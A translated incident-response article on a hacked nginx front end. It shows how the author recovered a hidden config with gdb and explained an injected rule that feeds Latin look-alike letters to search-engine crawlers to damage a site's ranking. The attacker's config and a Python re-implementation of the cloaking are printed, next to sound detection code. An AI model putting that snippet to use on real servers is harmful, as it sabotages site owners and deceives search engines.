When 'а' is not equal to 'a'. In the wake of a hack

An unpleasant story happened to one of my friends. But as unpleasant as it was for Mikhail, it was just as entertaining for me.

I should say that my friend is a fairly competent UNIX user: he can install the system himself, set up MySQL and PHP, and do a simple nginx configuration.
And he has a dozen or so sites devoted to construction tools.

One of these sites, dedicated to chainsaws, sits firmly in the top of the search engines. The site is a non-commercial review site, but someone got into the habit of attacking it: now DDoS, now brute force, now nasty comments and abuse complaints to the hosting provider and to RKN.
Suddenly everything calmed down, and this calm turned out to be for the worse: the site slowly began to slide out of the top lines of the search results.


That was the preamble, and now the admin's story itself.

It was close to bedtime when the phone rang: "San, could you take a look at my server? It seems to me I've been hacked; I can't prove it, but the feeling hasn't left me for three weeks now. Maybe it's time I got treatment for paranoia?"

A half-hour discussion followed, which can be summed up as follows.

  • the ground for a hack was fertile;
  • the attacker could have obtained superuser rights;
  • the attack (if it happened) was aimed specifically at this site;
  • the problem areas have been fixed, and all that remains is to understand whether anything was planted;
  • the hack could not have affected the site's code or the database.

On the last point.


Only the front end's IP is visible to the world. There is no interaction between the backend and the front end except http(s); users and passwords differ, and no keys are shared. On the grey (private) addresses, all ports except 80/443 are closed. The backend's public IPs are known only to two users, whom Mikhail trusts completely.

Debian 9 was installed on the front end and, by the time of the call, the system had been isolated from the world by an external firewall and stopped.

"Alright, give me access," I decided to postpone sleep for an hour. "I'll see it with my own eyes."

From here on:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Looking for a possible hack

I start the server, first in rescue mode. I mount the disks and quickly run through them: history, system logs and the like; where possible I look at file creation dates, although I understand that an ordinary intruder would have "cleaned up" after himself, and Misha had already "trampled" a lot while searching on his own.

I boot in normal mode; still not understanding what to look for, I study the configuration. First of all I'm interested in nginx since, in general, there is nothing else on the front end.
The configs are small, neatly arranged and split across a dozen files; I just cat them one by one. Everything seems clean, but you never know whether I've missed some include, so let me make a full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I don't get it: "Where's the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question joins the question about the listing: "Why such an ancient nginx version?"

Moreover, the system believes that the latest version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Wait, I don't even know how to do that!
- Well then, go to sleep...

Nginx was clearly rebuilt, and the "-T" listing output was hidden for a reason. There is no longer any doubt about the hack, and one could simply accept it (since Misha had already replaced the server with a new one) and consider the problem solved.

And really, once someone has obtained root, the only sensible thing to do is reinstall the system, and it is pointless to look for what is wrong there; but this time curiosity won over sleep. How do we find out what they wanted to hide from us?

Let's try tracing it:

$ strace nginx -T

We look, and there are clearly not enough lines in the trace like

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare the results.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I assume that a piece of code in src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so the "-T" listing is not printed.

But how do we see our config?

If my assumption is correct and the problem is only in the ngx_dump_config variable, let's try to set it using gdb; fortunately the --with-cc-opt '-g' flag is present, and hopefully the -O2 optimization won't get in our way. At the same time, since I don't know how ngx_dump_config might be handled inside case 'T':, I won't invoke that block but will set the variable using case 't':

Why can '-t' be used as well as '-T'? Because the if (ngx_dump_config) block is processed inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Of course, if the code was modified in this part and not in case 'T':, then my method won't work.

Test nginx.conf. Having already solved the problem in a test environment, it was established that the minimal configuration the malicious nginx build needs in order to run is:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

I'll use it for brevity in the article.

Starting the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Steps:

  • set a breakpoint on main()
  • start the program
  • change the value of the variable that controls config output: ngx_dump_config=1
  • continue/finish the program
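The four steps above are easy to script. Here, as an added example (not tooling from the original article), is a small Python helper that expresses the same gdb session as a batch command and then diffs the recovered dump against the config files that were reviewed on disk, so the parasitic lines stand out automatically instead of being spotted by eye. The gdb command assumes a binary with debug symbols, as -V showed here; the sample dump and on-disk contents are constructed from the listings on this page.

```python
"""Turn the interactive gdb session into a batch command and diff the
recovered dump against the config files reviewed on disk.
Added example for this article; not the author's own tooling."""
import re
import subprocess
from typing import Dict, List


def gdb_dump_argv(nginx_bin: str = "nginx") -> List[str]:
    """gdb --batch equivalent of: break main; run; set ngx_dump_config=1; continue.
    Assumes the binary carries debug symbols (-g), as the -V output showed."""
    return [
        "gdb", "--batch", "--silent",
        "-ex", "break main",
        "-ex", "run",
        "-ex", "set var ngx_dump_config = 1",
        "-ex", "continue",
        "--args", nginx_bin, "-t",
    ]


def run_gdb_dump(nginx_bin: str = "nginx") -> str:
    """Run the session; returns combined stdout/stderr (needs gdb and nginx)."""
    proc = subprocess.run(gdb_dump_argv(nginx_bin), capture_output=True, text=True)
    return proc.stdout + proc.stderr


# `nginx -T` (and the forced dump) prints every file as a
# "# configuration file <path>:" header followed by the file body.
HEADER = re.compile(r"^# configuration file (?P<path>.+?):\s*$")
# gdb/nginx chatter that lands in the same stream as the dump.
NOISE = re.compile(r"^(\[Inferior |\[Thread |Using host |Breakpoint \d|Starting program|nginx: )")


def parse_config_dump(dump: str) -> Dict[str, str]:
    """Map each dumped path to its body, dropping gdb noise."""
    files: Dict[str, List[str]] = {}
    current = None
    for line in dump.splitlines():
        m = HEADER.match(line)
        if m:
            current = m.group("path")
            files[current] = []
        elif current is not None and not NOISE.match(line):
            files[current].append(line)
    return {p: "\n".join(body).strip() for p, body in files.items()}


def directives(text: str) -> List[str]:
    """Non-empty, non-comment lines with whitespace normalised."""
    out = []
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#"):
            out.append(re.sub(r"\s+", " ", s))
    return out


def hidden_directives(dump: str, on_disk: Dict[str, str]) -> Dict[str, List[str]]:
    """Lines the running binary sees that the reviewed on-disk files lack.
    `on_disk` maps the same paths to the contents you read with cat."""
    found: Dict[str, List[str]] = {}
    for path, body in parse_config_dump(dump).items():
        seen = set(directives(on_disk.get(path, "")))
        extra = [d for d in directives(body) if d not in seen]
        if extra:
            found[path] = extra
    return found


# Constructed sample: a shortened version of the dump recovered in the article
# and the innocent-looking files the admin had on disk.
SAMPLE_DUMP = """\
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*www.google.com/bot.html" 1;
default 0;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
"""

SAMPLE_ON_DISK = {
    "/etc/nginx/nginx.conf": "events {\n}\n\nhttp {\n\tinclude /etc/nginx/sites-enabled/*;\n}\n",
    "/etc/nginx/sites-enabled/default": "",
}

if __name__ == "__main__":
    # On a live box: hidden_directives(run_gdb_dump("/usr/sbin/nginx"), files_read_from_disk)
    for path, extra in hidden_directives(SAMPLE_DUMP, SAMPLE_ON_DISK).items():
        print(path)
        for d in extra:
            print("  +", d)
```

The comparison is deliberately line-based rather than a full nginx parser: the goal is only to surface directives the binary loads that are not in any file you can read, which is exactly the case a patched -T is designed to hide. If the dump and the files agree but the binary still looks wrong, the modification is elsewhere (a module, or the case 'T' block itself), as the article notes.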

As we can see, the actual config differs from mine, and we extract the parasitic part:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's look in order at what is happening here.

The yandex/google User-Agent is detected:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

WordPress service pages are excluded:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for requests that fall under both conditions above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of the html pages 'о' is replaced with 'o' and 'а' with 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

That's right, the only trick is that 'а' != 'a', just as 'о' != 'o': the first of each pair is the Cyrillic letter (U+0430 'а', U+043E 'о'), the second is its Latin look-alike (U+0061 'a', U+006F 'o'). In a browser they are indistinguishable, but to a search engine they are different characters.

So instead of 100% normal Cyrillic text, the search engine bots receive modified garbage interspersed with Latin 'a' and 'o'. I didn't get a chance to discuss how this affects SEO, but it is unlikely that such characters have a positive effect on positions in the search results.
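As an added example (not the attacker's config and not nginx's own code), the following Python models the three maps and the sub_filter as one function, then shows the check a practitioner would run against a suspect site: fetch the same URL once with a browser User-Agent and once with a crawler User-Agent, and look for words that mix Cyrillic and Latin letters. The sample page and User-Agent strings are constructed; the cloaking function follows the listing above (lowercase 'о' and 'а' only, bot UA and not a /wp- URI).

```python
"""Reproduce the injected cloaking logic and detect its fingerprint.
Added example: a Python model of the maps/sub_filter above, not
nginx's implementation and not the attacker's code."""
import re
import unicodedata
from typing import List, Tuple

CYR_O, LAT_O = "\u043e", "o"   # Cyrillic 'о' and its Latin look-alike
CYR_A, LAT_A = "\u0430", "a"   # Cyrillic 'а' and its Latin look-alike

# map $http_user_agent $sign_user_agent  ->  1 for the crawler UAs
BOT_UA = re.compile(r"yandex\.com/bots|www\.google\.com/bot\.html", re.IGNORECASE)
# map $uri $sign_uri  ->  1 for WordPress service paths
WP_URI = re.compile(r"/wp-", re.IGNORECASE)


def cloak(html: str, user_agent: str, uri: str) -> str:
    """What the patched front end served.  The combined maps pick the Latin
    letter only for sign_user_agent=1 and sign_uri=0; everyone else gets the
    page untouched, so a human visitor never sees the difference."""
    if BOT_UA.search(user_agent) and not WP_URI.search(uri):
        return html.replace(CYR_O, LAT_O).replace(CYR_A, LAT_A)
    return html


WORD = re.compile(r"\w+")


def script_of(ch: str) -> str:
    """First word of the Unicode name: 'CYRILLIC', 'LATIN', ..."""
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def mixed_script_words(text: str) -> List[Tuple[str, str]]:
    """Words mixing Cyrillic and Latin letters, with the Latin code points.
    A genuine Russian page has almost none; a cloaked one has them in
    nearly every word that contains 'а' or 'о'."""
    hits = []
    for word in WORD.findall(text):
        letters = [c for c in word if c.isalpha()]
        scripts = {script_of(c) for c in letters}
        if "CYRILLIC" in scripts and "LATIN" in scripts:
            latin = ",".join(f"U+{ord(c):04X}" for c in letters if script_of(c) == "LATIN")
            hits.append((word, latin))
    return hits


def looks_cloaked(as_browser: str, as_bot: str) -> bool:
    """The check to run on a suspect site: the same URL fetched with a browser
    UA and with a crawler UA should be identical and free of mixed-script words."""
    return as_browser != as_bot and bool(mixed_script_words(as_bot))


# Constructed sample page and User-Agents (not from the compromised site).
SAMPLE_PAGE = "<p>Обзор бензопилы: мощная и надёжная модель для дачи.</p>"
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

if __name__ == "__main__":
    bot_view = cloak(SAMPLE_PAGE, GOOGLEBOT, "/review/chainsaw")
    print(bot_view)
    for word, cps in mixed_script_words(bot_view):
        print(f"{word}: latin {cps}")
    print("cloaked:", looks_cloaked(SAMPLE_PAGE, bot_view))
```

Two caveats when using this against a real site: fetch both views from outside the front end (a request from the backend never passes the sub_filter), and expect a few legitimate mixed-script tokens such as product codes or brand names, so judge by the proportion of affected words rather than by a single hit.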

What can I say: well done, guys.

References

Configuring GDB
gdb(1) - Linux man page
strace(1) - Linux man page
Nginx - Module ngx_http_sub_module
About chainsaws, chains and electric saws

Source: www.habr.com
